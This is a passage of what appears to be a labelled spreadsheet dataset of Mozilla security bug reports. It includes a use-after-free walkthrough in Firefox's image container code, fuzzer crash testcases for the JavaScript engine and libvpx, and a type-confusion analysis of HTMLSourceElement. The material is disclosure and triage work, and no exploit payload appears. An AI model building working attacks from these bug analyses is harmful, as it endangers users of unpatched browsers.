InternalAddFrame will check if the frame length is 2, and then call
StartAnimation as there's more than 1 frame to flip through.
modules/libpr0n/src/imgContainer.cpp:421
nsresult imgContainer::InternalAddFrame(PRUint32 framenum,
                                        PRInt32 aX, PRInt32 aY,
                                        PRInt32 aWidth, PRInt32
aHeight,
                                        gfxASurface::gfxImageFormat
aFormat,
                                        PRUint8 aPaletteDepth,
                                        PRUint8 **imageData,
                                        PRUint32 *imageLength,
                                        PRUint32 **paletteData,
                                        PRUint32 *paletteLength)
{
  if (framenum &gt; PRUint32(mNumFrames))
    return NS_ERROR_INVALID_ARG;
  nsAutoPtr&lt;imgFrame&gt; frame(new imgFrame());
  NS_ENSURE_TRUE(frame, NS_ERROR_OUT_OF_MEMORY);
  nsresult rv = frame-&gt;Init(aX, aY, aWidth, aHeight, aFormat,
aPaletteDepth);
  NS_ENSURE_SUCCESS(rv, rv);
  if (mFrames.Length() == 0) {
    return InternalAddFrameHelper(framenum, frame.forget(), imageData,
imageLength,
                                  paletteData, paletteLength);
  }
...
  // If this is our second frame (We've just added our second frame
above),
  // count should now be 2.  This must be called after we AppendObject
  // because StartAnimation checks for &gt; 1 frames
  if (mFrames.Length() == 2)
    StartAnimation();   // XXX
  return rv;
}
StartAnimation will then fetch the current image frame, and then start a
timeout for animating.
modules/libpr0n/src/imgContainer.cpp:699
NS_IMETHODIMP imgContainer::StartAnimation()
{
  if (mAnimationMode == kDontAnimMode ||
      (mAnim &amp;&amp; (mAnim-&gt;timer || mAnim-&gt;animating)))
    return NS_OK;
  if (mNumFrames &gt; 1) {
    if (!ensureAnimExists())
      return NS_ERROR_OUT_OF_MEMORY;
    // Default timeout to 100: the timer notify code will do the right
    // thing, so just get that started.
    PRInt32 timeout = 100;
    imgFrame *currentFrame = GetCurrentImgFrame();  // XXX: calls
::GetImgFrame
    if (currentFrame) {
      timeout = currentFrame-&gt;GetTimeout();
      if (timeout &lt;= 0) // -1 means display this frame forever
        return NS_OK;
    }
Once reaching GetImgFrame, RestoreDiscardedData will get called, this
will later called ReloadImages.
modules/libpr0n/src/imgContainer.cpp:192
imgFrame *imgContainer::GetImgFrame(PRUint32 framenum)
{
  nsresult rv = RestoreDiscardedData(); // XXX
  NS_ENSURE_SUCCESS(rv, nsnull);
modules/libpr0n/src/imgContainer.cpp:933
NS_IMETHODIMP imgContainer::Notify(nsITimer *timer)
{
  // Note that as long as the image is animated, it will not be
discarded,
  // so this should never happen...
  nsresult rv = RestoreDiscardedData(); // XXX
modules/libpr0n/src/imgContainer.cpp:1616
nsresult
imgContainer::RestoreDiscardedData(void)
{
  // mRestoreDataDone = PR_TRUE means that we want to timeout and then
discard the image frames
  // So, we only need to restore, if mRestoreDataDone is true, and then
only when the frames are discarded...
  if (!mRestoreDataDone)
    return NS_OK;
  // Reset timer, as the frames are accessed
  nsresult rv = ResetDiscardTimer();
  NS_ENSURE_SUCCESS(rv, rv);
  if (!mDiscarded)
    return NS_OK;
  int num_expected_frames = mNumFrames;
  // To prevent that ReloadImages is called multiple times, reset the
flag before reloading
  mDiscarded = PR_FALSE;
  rv = ReloadImages();  // XXX
Upon reaching ReloadImages, the library will ask the image decoder to
initialize another image, which it will then write data to via the
WriteFrom method of the decoder.
modules/libpr0n/src/imgContainer.cpp:1830
  nsresult result = decoder-&gt;Init(loader);
  if (NS_FAILED(result)) {
    PR_LOG(gCompressedImageAccountingLog, PR_LOG_WARNING,
           ("CompressedImageAccounting: imgContainer::ReloadImages()
image container %p "
            "failed to initialize the decoder (%s)",
            this,
            mDiscardableMimeType.get()));
    return result;
  }
...
  // |WriteFrom()| may fail if the original data is broken.
  PRUint32 written;
  (void)decoder-&gt;WriteFrom(stream, mRestoreData.Length(), &amp;written); //
XXX
modules/libpr0n/decoders/jpeg/nsJPEGDecoder.cpp:259
/* unsigned long writeFrom (in nsIInputStream inStr, in unsigned long
count); */
NS_IMETHODIMP nsJPEGDecoder::WriteFrom(nsIInputStream *inStr, PRUint32
count, PRUint32 *writeCount)
{
  NS_ENSURE_ARG_POINTER(inStr);
  NS_ENSURE_ARG_POINTER(writeCount);
  /* necko doesn't propagate the errors from ReadDataOut */
  nsresult rv = inStr-&gt;ReadSegments(ReadDataOut, this, count,
writeCount);   // XXX
modules/libpr0n/decoders/jpeg/nsJPEGDecoder.cpp:240
static NS_METHOD ReadDataOut(nsIInputStream* in,
                             void* closure,
                             const char* fromRawSegment,
                             PRUint32 toOffset,
                             PRUint32 count,
                             PRUint32 *writeCount)
{
  nsJPEGDecoder *decoder = static_cast&lt;nsJPEGDecoder*&gt;(closure);
  nsresult rv = decoder-&gt;ProcessData(fromRawSegment, count, writeCount);
 //XXX
modules/libpr0n/decoders/jpeg/nsJPEGDecoder.cpp:276
nsresult nsJPEGDecoder::ProcessData(const char *data, PRUint32 count,
PRUint32 *writeCount)
{
  LOG_SCOPE_WITH_PARAM(gJPEGlog, "nsJPEGDecoder::ProcessData", "count",
count);
Upon parsing all useful data for the jpeg image, the library will then
call EnsureCleanFrame, to allocate a frame at a particular index.
modules/libpr0n/decoders/jpeg/nsJPEGDecoder.cpp:458
    /* verify that the width and height of the image are the same as
     * the container we're about to put things in to.
     * XXX it might not matter maybe we should just resize the image.
     */
    PRInt32 width, height;
    mImage-&gt;GetWidth(&amp;width);
    mImage-&gt;GetHeight(&amp;height);
    if (width == 0 &amp;&amp; height == 0) {
      mImage-&gt;Init(mInfo.image_width, mInfo.image_height, mObserver);
    } else if ((width != (PRInt32)mInfo.image_width) || (height !=
(PRInt32)mInfo.image_height)) {
      mState = JPEG_ERROR;
      return NS_ERROR_UNEXPECTED;
    }
    mImage-&gt;Init(mInfo.image_width, mInfo.image_height, mObserver);
    mObserver-&gt;OnStartContainer(nsnull, mImage);
    // Use EnsureCleanFrame so we don't create a new frame if we're
being
    // reused for e.g. multipart/x-replace
    PRUint32 imagelength;
    if (NS_FAILED(mImage-&gt;EnsureCleanFrame(0, 0, 0, mInfo.image_width,
mInfo.image_height,
gfxASurface::ImageFormatRGB24,
                                           &amp;mImageData, &amp;imagelength)))
{    // XXX
EnsureCleanFrame will then get called. This will allocate a new frame
via InternalAddFrame at the specified Index..Unless the format is
different.
modules/libpr0n/src/imgContainer.cpp:515
/*  [noscript] void ensureCleanFrame(in unsigned long aFramenum, in
PRInt32 aX, in PRInt32 aY, in PRInt32 aWidth, in PRInt32 aHeight, in
gfxImageFormat aFormat, [array, size_is(imageLength)] out PRUint8
imageData, out unsigned long imageLength); */
NS_IMETHODIMP imgContainer::EnsureCleanFrame(PRUint32 aFrameNum, PRInt32
aX, PRInt32 aY,
                                             PRInt32 aWidth, PRInt32
aHeight, 
                                             gfxASurface::gfxImageFormat
aFormat,
                                             PRUint8 **imageData,
PRUint32 *imageLength)
{
  NS_ENSURE_ARG_POINTER(imageData);
  NS_ENSURE_ARG_POINTER(imageLength);
  if (aFrameNum &gt; PRUint32(mNumFrames))
    return NS_ERROR_INVALID_ARG;
  // Adding a frame that doesn't already exist.
  if (aFrameNum == PRUint32(mNumFrames))
    return InternalAddFrame(aFrameNum, aX, aY, aWidth, aHeight, aFormat,
                            /* aPaletteDepth = */ 0, imageData,
imageLength,
                            /* aPaletteData = */ nsnull, 
                            /* aPaletteLength = */ nsnull);
  imgFrame *frame = GetImgFrame(aFrameNum);
  if (!frame)
    return InternalAddFrame(aFrameNum, aX, aY, aWidth, aHeight, aFormat,
                            /* aPaletteDepth = */ 0, imageData,
imageLength,
                            /* aPaletteData = */ nsnull, 
                            /* aPaletteLength = */ nsnull);
  // See if we can re-use the frame that already exists.
  nsIntRect rect = frame-&gt;GetRect();
  if (rect.x != aX || rect.y != aY || rect.width != aWidth ||
rect.height != aHeight ||
      frame-&gt;GetFormat() != aFormat) {
    delete frame;
    return InternalAddFrame(aFrameNum, aX, aY, aWidth, aHeight, aFormat,
                            /* aPaletteDepth = */ 0, imageData,
imageLength,
                            /* aPaletteData = */ nsnull, 
                            /* aPaletteLength = */ nsnull);
  }
Due to the format being different, the deleted frame will still remain
in the list of containers at which point an attacker will need to figure
out how to get the frame to be utilized in the current execution path.
One example would be upon image container destruction.
modules/libpr0n/src/imgContainer.cpp:90
imgContainer::~imgContainer()
{
  if (mAnim)
    delete mAnim;
  for (unsigned int i = 0; i &lt; mFrames.Length(); ++i)
    delete mFrames[i];
Version(s)  tested: Mozilla Firefox 3.6
Platform(s) tested: Windows XP SP3
-- CREDIT --------------------------------------------------------------
This vulnerability was discovered by:
    * regenrecht</t>
        </is>
      </c>
      <c r="X5525" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5526">
      <c r="A5526" t="n">
        <v>1224363</v>
      </c>
      <c r="B5526" t="inlineStr">
        <is>
          <t>2015-11-12 14:38:00 -0800</t>
        </is>
      </c>
      <c r="C5526" t="inlineStr">
        <is>
          <t>UBSan: index out of bounds [@vp8_loop_filter_row_simple]</t>
        </is>
      </c>
      <c r="D5526" t="inlineStr">
        <is>
          <t>2016-07-02 11:35:48 -0700</t>
        </is>
      </c>
      <c r="E5526" t="n">
        <v>1</v>
      </c>
      <c r="F5526" t="n">
        <v>1</v>
      </c>
      <c r="G5526" t="n">
        <v>3</v>
      </c>
      <c r="H5526" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5526" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5526" t="inlineStr">
        <is>
          <t>Audio/Video: Playback</t>
        </is>
      </c>
      <c r="K5526" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5526" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5526" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5526" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5526" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5526" t="inlineStr">
        <is>
          <t>[adv-main45+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q5526" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5526" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5526" t="inlineStr">
        <is>
          <t>mozilla45</t>
        </is>
      </c>
      <c r="T5526" t="n">
        <v>1</v>
      </c>
      <c r="U5526" t="n">
        <v>0</v>
      </c>
      <c r="V5526" t="n">
        <v>20</v>
      </c>
      <c r="W5526" t="inlineStr">
        <is>
          <t>This was found by fuzzing libvpx (commit c6641709a707ccb98cbdf785428659e44d4f2c8b) and it appears to be in our branch.
https://dxr.mozilla.org/mozilla-central/source/media/libvpx/vp8/common/loopfilter.c#285
vp8/common/vp8_loopfilter.c:285:39: runtime error: index 254 out of bounds for type 'unsigned char [64][16]'
    #0 0x77d6a1 in vp8_loop_filter_row_simple (/home/user/Desktop/libvpx/simple_decoder_ub_asan+0x77d6a1)
    #1 0x83f10d in decode_mb_rows (/home/user/Desktop/libvpx/simple_decoder_ub_asan+0x83f10d)
    #2 0x837e2d in vp8_decode_frame (/home/user/Desktop/libvpx/simple_decoder_ub_asan+0x837e2d)
    #3 0x5d052d in vp8dx_receive_compressed_data (/home/user/Desktop/libvpx/simple_decoder_ub_asan+0x5d052d)
    #4 0x5ca52c in vp8_decode (/home/user/Desktop/libvpx/simple_decoder_ub_asan+0x5ca52c)
    #5 0x4ecdde in vpx_codec_decode (/home/user/Desktop/libvpx/simple_decoder_ub_asan+0x4ecdde)
    #6 0x4eb189 in main /home/user/code/libvpx/examples/simple_decoder.c:135:11
    #7 0x7fb1aca3bec4 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287
    #8 0x41dad5 in _start (/home/user/Desktop/libvpx/simple_decoder_ub_asan+0x41dad5)</t>
        </is>
      </c>
      <c r="X5526" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5527">
      <c r="A5527" t="n">
        <v>1684020</v>
      </c>
      <c r="B5527" t="inlineStr">
        <is>
          <t>2020-12-23 03:31:24 -0800</t>
        </is>
      </c>
      <c r="C5527" t="inlineStr">
        <is>
          <t>Assertion failure: next == JSOp::CheckThis || next == JSOp::CheckReturn || next == JSOp::CheckThisReinit || next == JSOp::CheckLexical, at vm/Interpreter.cpp:3715 or Assertion failure: v.isSymbol() || v.isBigInt(), at jsnum.cpp:1944</t>
        </is>
      </c>
      <c r="D5527" t="inlineStr">
        <is>
          <t>2024-05-30 10:25:18 -0700</t>
        </is>
      </c>
      <c r="E5527" t="n">
        <v>1</v>
      </c>
      <c r="F5527" t="n">
        <v>1</v>
      </c>
      <c r="G5527" t="n">
        <v>3</v>
      </c>
      <c r="H5527" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5527" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5527" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5527" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5527" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5527" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5527" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5527" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5527" t="inlineStr">
        <is>
          <t>[sec-survey][adv-main85+][adv-esr78.7+]</t>
        </is>
      </c>
      <c r="Q5527" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5527" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S5527" t="inlineStr">
        <is>
          <t>86 Branch</t>
        </is>
      </c>
      <c r="T5527" t="n">
        <v>1</v>
      </c>
      <c r="U5527" t="n">
        <v>0</v>
      </c>
      <c r="V5527" t="n">
        <v>25</v>
      </c>
      <c r="W5527" t="inlineStr">
        <is>
          <t>```js
switch (0) {
    case e &amp;&amp;= x:
    case x % 0:
        let x;
}
var e;
```
Run with `--fuzzing-safe --no-threads --no-baseline --no-ion`:
```
Assertion failure: next == JSOp::CheckThis || next == JSOp::CheckReturn || next == JSOp::CheckThisReinit || next == JSOp::CheckLexical, at /home/skygentoo/trees/mozilla-central/js/src/vm/Interpreter.cpp:3715
Thread 1 "js-dbg-64-linux" received signal SIGSEGV, Segmentation fault.
Interpret (cx=&lt;optimized out&gt;, cx@entry=0x7ffff6924000, state=...) at /home/skygentoo/trees/mozilla-central/js/src/vm/Interpreter.cpp:3714
3714	        MOZ_ASSERT(next == JSOp::CheckThis || next == JSOp::CheckReturn ||
(gdb) bt
#0  Interpret (cx=&lt;optimized out&gt;, cx@entry=0x7ffff6924000, state=...) at /home/skygentoo/trees/mozilla-central/js/src/vm/Interpreter.cpp:3714
#1  0x0000555556c1d398 in js::RunScript (cx=cx@entry=0x7ffff6924000, state=...) at /home/skygentoo/trees/mozilla-central/js/src/vm/Interpreter.cpp:473
#2  0x0000555556c33173 in js::ExecuteKernel (cx=cx@entry=0x7ffff6924000, script=..., script@entry=..., envChainArg=envChainArg@entry=..., 
    newTargetValue=..., evalInFrame=..., evalInFrame@entry=..., result=...) at /home/skygentoo/trees/mozilla-central/js/src/vm/Interpreter.cpp:839
#3  0x0000555556c335e0 in js::Execute (cx=cx@entry=0x7ffff6924000, script=..., envChain=..., rval=..., rval@entry=...)
    at /home/skygentoo/trees/mozilla-central/js/src/vm/Interpreter.cpp:871
#4  0x0000555556de07e2 in ExecuteScript (cx=cx@entry=0x7ffff6924000, envChain=..., script=..., rval=rval@entry=...)
    at /home/skygentoo/trees/mozilla-central/js/src/vm/CompilationAndEvaluation.cpp:424
#5  0x0000555556de09c2 in JS_ExecuteScript (cx=cx@entry=0x7ffff6924000, scriptArg=scriptArg@entry=...)
    at /home/skygentoo/trees/mozilla-central/js/src/vm/CompilationAndEvaluation.cpp:457
#6  0x0000555556b7c147 in RunFile (cx=cx@entry=0x7ffff6924000, filename=0x5b71ff8cccd27 &lt;error: Cannot access memory at address 0x5b71ff8cccd27&gt;, 
    filename@entry=0x7ffff7756020 "\230$\255\373\344\344\344", &lt;incomplete sequence \344&gt;, file=&lt;optimized out&gt;, file@entry=0x7ffff7756020, 
    compileMethod=&lt;optimized out&gt;, compileMethod@entry=CompileUtf8::DontInflate, compileOnly=false)
    at /home/skygentoo/trees/mozilla-central/js/src/shell/js.cpp:982
#7  0x0000555556b7b829 in Process (cx=cx@entry=0x7ffff6924000, filename=&lt;optimized out&gt;, forceTTY=false, kind=kind@entry=FileScript)
    at /home/skygentoo/trees/mozilla-central/js/src/shell/js.cpp:1573
#8  0x0000555556b44701 in ProcessArgs (cx=0x7ffff6924000, op=0x7fffffffd7e0) at /home/skygentoo/trees/mozilla-central/js/src/shell/js.cpp:10378
#9  Shell (cx=0x7ffff6924000, op=&lt;optimized out&gt;, op@entry=0x7fffffffd7e0, envp=&lt;optimized out&gt;)
    at /home/skygentoo/trees/mozilla-central/js/src/shell/js.cpp:11119
#10 0x0000555556b3d92e in main (argc=6, argv=&lt;optimized out&gt;, envp=&lt;optimized out&gt;) at /home/skygentoo/trees/mozilla-central/js/src/shell/js.cpp:11918
(gdb)
```
Run with `--fuzzing-safe --no-threads --no-baseline --no-ion --blinterp-warmup-threshold=0`:
```
Assertion failure: v.isSymbol() || v.isBigInt(), at /home/skygentoo/trees/mozilla-central/js/src/jsnum.cpp:1944
Thread 1 "js-dbg-64-linux" received signal SIGSEGV, Segmentation fault.
js::ToNumberSlow (cx=&lt;optimized out&gt;, cx@entry=0x7ffff6924000, v_=..., out=out@entry=0x7fffffffb670)
    at /home/skygentoo/trees/mozilla-central/js/src/jsnum.cpp:1944
1944	  MOZ_ASSERT(v.isSymbol() || v.isBigInt());
(gdb) bt
#0  js::ToNumberSlow (cx=&lt;optimized out&gt;, cx@entry=0x7ffff6924000, v_=..., out=out@entry=0x7fffffffb670)
    at /home/skygentoo/trees/mozilla-central/js/src/jsnum.cpp:1944
#1  0x0000555556d337c7 in js::ToNumber (cx=0x7ffff6924000, vp=...) at /home/skygentoo/trees/mozilla-central/js/src/jsnum.h:220
#2  js::ToNumericSlow (cx=cx@entry=0x7ffff6924000, vp=vp@entry=...) at /home/skygentoo/trees/mozilla-central/js/src/jsnum.cpp:1975
#3  0x0000555556c37cbb in js::ToNumeric (cx=0x7ffff6924000, vp=...) at /home/skygentoo/trees/mozilla-central/js/src/jsnum.h:236
#4  ModOperation (cx=cx@entry=0x7ffff6924000, lhs=lhs@entry=..., rhs=rhs@entry=..., res=...)
    at /home/skygentoo/trees/mozilla-central/js/src/vm/Interpreter.cpp:1540
#5  0x0000555556c37c17 in js::ModValues (cx=0x7ffff7bb19a0 &lt;_IO_stdfile_2_lock&gt;, cx@entry=0x7ffff6924000, lhs=..., lhs@entry=..., rhs=..., rhs@entry=..., 
    res=..., res@entry=...) at /home/skygentoo/trees/mozilla-central/js/src/vm/Interpreter.cpp:4833
#6  0x0000555557633d7d in js::jit::DoBinaryArithFallback (cx=0x7ffff6924000, frame=0x7fffffffbaa0, stub=0x7ffff69fa110, lhs=..., rhs=..., ret=...)
    at /home/skygentoo/trees/mozilla-central/js/src/jit/BaselineIC.cpp:2465
#7  0x00000bfd04b2ed73 in ?? ()
#8  0x00007fffffffbae8 in ?? ()
#9  0x00007fffffffba38 in ?? ()
#10 0x00007fffffffbae8 in ?? ()
#11 0xfff9800000000000 in ?? ()
#12 0x0000555558121c50 in js::jit::vmFunctions ()
#13 0x00000bfd04b38e39 in ?? ()
#14 0x0000000000009821 in ?? ()
#15 0x00007fffffffbaa0 in ?? ()
#16 0x00007ffff69fa110 in ?? ()
#17 0xfffa80000000000b in ?? ()
#18 0xfff8800000000000 in ?? ()
#19 0xfff8800000000000 in ?? ()
#20 0xfffa80000000000b in ?? ()
#21 0xfff8800000000000 in ?? ()
#22 0xfff8800000000000 in ?? ()
#23 0xfffa80000000000b in ?? ()
#24 0x00001f1f7d59b060 in ?? ()
#25 0x00007ffff695ba72 in ?? ()
#26 0x00007ffff67f36e8 in ?? ()
#27 0x00001f1f7d579040 in ?? ()
#28 0x00007ffff67f3678 in ?? ()
#29 0x00007ffff6924000 in ?? ()
#30 0x00007fffffffbb00 in ?? ()
#31 0x0000007800000002 in ?? ()
#32 0x0000000000000000 in ?? ()
(gdb)
```
Run with the respective flags above, compile with `AR=ar sh ./configure --enable-debug --with-ccache --enable-gczeal --enable-debug-symbols --disable-tests`, tested on m-c rev f725a528bb4c.
Not sure if this is s-s yet.</t>
        </is>
      </c>
      <c r="X5527" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5528">
      <c r="A5528" t="n">
        <v>996883</v>
      </c>
      <c r="B5528" t="inlineStr">
        <is>
          <t>2014-04-15 15:51:53 -0700</t>
        </is>
      </c>
      <c r="C5528" t="inlineStr">
        <is>
          <t>Crash [@ js::jit::Simulator::decodeType2]</t>
        </is>
      </c>
      <c r="D5528" t="inlineStr">
        <is>
          <t>2015-08-30 12:00:43 -0700</t>
        </is>
      </c>
      <c r="E5528" t="n">
        <v>1</v>
      </c>
      <c r="F5528" t="n">
        <v>1</v>
      </c>
      <c r="G5528" t="n">
        <v>3</v>
      </c>
      <c r="H5528" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5528" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5528" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5528" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5528" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M5528" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5528" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5528" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5528" t="inlineStr">
        <is>
          <t>[adv-main29+]</t>
        </is>
      </c>
      <c r="Q5528" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5528" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5528" t="inlineStr">
        <is>
          <t>mozilla31</t>
        </is>
      </c>
      <c r="T5528" t="n">
        <v>1</v>
      </c>
      <c r="U5528" t="n">
        <v>0</v>
      </c>
      <c r="V5528" t="n">
        <v>22</v>
      </c>
      <c r="W5528" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 1f932e462b84 (x86 ARM simulator build, run with --fuzzing-safe --ion-eager):
var x=0
var y=0;
x++;
var merge_type_maps_x = 0
var merge_type_maps_y = 0;
for (merge_type_maps_x = 0; x &amp; 0xFFFF; ++merge_type_maps_x)
  ++merge_type_maps_y;</t>
        </is>
      </c>
      <c r="X5528" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5529">
      <c r="A5529" t="n">
        <v>1151650</v>
      </c>
      <c r="B5529" t="inlineStr">
        <is>
          <t>2015-04-06 15:11:17 -0700</t>
        </is>
      </c>
      <c r="C5529" t="inlineStr">
        <is>
          <t>GfxInfoBase::GetFeatureStatus() sends an IPDL message off the main thread</t>
        </is>
      </c>
      <c r="D5529" t="inlineStr">
        <is>
          <t>2016-07-02 10:39:49 -0700</t>
        </is>
      </c>
      <c r="E5529" t="n">
        <v>1</v>
      </c>
      <c r="F5529" t="n">
        <v>1</v>
      </c>
      <c r="G5529" t="n">
        <v>3</v>
      </c>
      <c r="H5529" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5529" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5529" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K5529" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5529" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5529" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5529" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5529" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5529" t="inlineStr">
        <is>
          <t>[fixed by bug 1151713][adv-main39+][adv-esr38.1+]</t>
        </is>
      </c>
      <c r="Q5529" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5529" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5529" t="inlineStr">
        <is>
          <t>mozilla40</t>
        </is>
      </c>
      <c r="T5529" t="n">
        <v>1</v>
      </c>
      <c r="U5529" t="n">
        <v>0</v>
      </c>
      <c r="V5529" t="n">
        <v>24</v>
      </c>
      <c r="W5529" t="inlineStr">
        <is>
          <t>This is similar to bug 1146416.  It looks like  	GfxInfoBase::GetFeatureStatus(int, int*) is being called off the main thread, which makes us send an IPDL message to the parent.  While this is happening, we have a script blocker which ends up capturing some main thread stuff, and running it off the main thread.
https://crash-stats.mozilla.com/report/index/3c3806c2-9cca-4914-9eac-ec8a82150402#allthreads</t>
        </is>
      </c>
      <c r="X5529" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5530">
      <c r="A5530" t="n">
        <v>1134561</v>
      </c>
      <c r="B5530" t="inlineStr">
        <is>
          <t>2015-02-19 02:08:28 -0800</t>
        </is>
      </c>
      <c r="C5530" t="inlineStr">
        <is>
          <t>Type confusion in HTMLSourceElement::AfterSetAttr</t>
        </is>
      </c>
      <c r="D5530" t="inlineStr">
        <is>
          <t>2024-05-30 08:40:03 -0700</t>
        </is>
      </c>
      <c r="E5530" t="n">
        <v>1</v>
      </c>
      <c r="F5530" t="n">
        <v>1</v>
      </c>
      <c r="G5530" t="n">
        <v>3</v>
      </c>
      <c r="H5530" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5530" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5530" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K5530" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5530" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5530" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5530" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5530" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5530" t="inlineStr">
        <is>
          <t>[adv-main37+]</t>
        </is>
      </c>
      <c r="Q5530" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5530" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5530" t="inlineStr">
        <is>
          <t>mozilla39</t>
        </is>
      </c>
      <c r="T5530" t="n">
        <v>1</v>
      </c>
      <c r="U5530" t="n">
        <v>0</v>
      </c>
      <c r="V5530" t="n">
        <v>15</v>
      </c>
      <c r="W5530" t="inlineStr">
        <is>
          <t>Created attachment 8566444
testcase
The issue can be triggered while setting a specific attribute (srcset,sizes,media,type) of a &lt;source&gt; element. When iterating over the sibling elements in order to find an HTMLImageElement this function does only check the tag name and not the namespace:
nsresult
HTMLSourceElement::AfterSetAttr(int32_t aNameSpaceID, nsIAtom* aName,
                                const nsAttrValue* aValue, bool aNotify)
{
  // If we are associated with a &lt;picture&gt; with a valid &lt;img&gt;, notify it of
  // responsive parameter changes
  nsINode *parent = nsINode::GetParentNode();
  if (aNameSpaceID == kNameSpaceID_None &amp;&amp;
      (aName == nsGkAtoms::srcset ||
       aName == nsGkAtoms::sizes ||
       aName == nsGkAtoms::media ||
       aName == nsGkAtoms::type) &amp;&amp;
      parent &amp;&amp; parent-&gt;Tag() == nsGkAtoms::picture) {
    nsString strVal = aValue ? aValue-&gt;GetStringValue() : EmptyString();
    // Find all img siblings after this &lt;source&gt; and notify them of the change
    nsCOMPtr&lt;nsINode&gt; sibling = AsContent();
    while ( (sibling = sibling-&gt;GetNextSibling()) ) {
      if (sibling-&gt;Tag() == nsGkAtoms::img) {
        HTMLImageElement *img = static_cast&lt;HTMLImageElement*&gt;(sibling.get());
        if (aName == nsGkAtoms::srcset) {
          img-&gt;PictureSourceSrcsetChanged(AsContent(), strVal, aNotify);
        } else if (aName == nsGkAtoms::sizes) {
          img-&gt;PictureSourceSizesChanged(AsContent(), strVal, aNotify);
        } else if (aName == nsGkAtoms::media ||
                   aName == nsGkAtoms::type) {
          img-&gt;PictureSourceMediaOrTypeChanged(AsContent(), aNotify);
        }
      }
    }
This results in a cast of an object which isn't an HTMLImageElement to this type. The attached testcase demonstrates this behaviour. ASan output attached as well. ASan detects this as a use-after-free issue.</t>
        </is>
      </c>
      <c r="X5530" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5531">
      <c r="A5531" t="n">
        <v>1705211</v>
      </c>
      <c r="B5531" t="inlineStr">
        <is>
          <t>2021-04-14 13:52:49 -0700</t>
        </is>
      </c>
      <c r="C5531" t="inlineStr">
        <is>
          <t>Security: Origin spoof in external protocol dialogs via server-side redirect to external protocol</t>
        </is>
      </c>
      <c r="D5531" t="inlineStr">
        <is>
          <t>2024-05-30 10:30:07 -0700</t>
        </is>
      </c>
      <c r="E5531" t="n">
        <v>1</v>
      </c>
      <c r="F5531" t="n">
        <v>1</v>
      </c>
      <c r="G5531" t="n">
        <v>3</v>
      </c>
      <c r="H5531" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
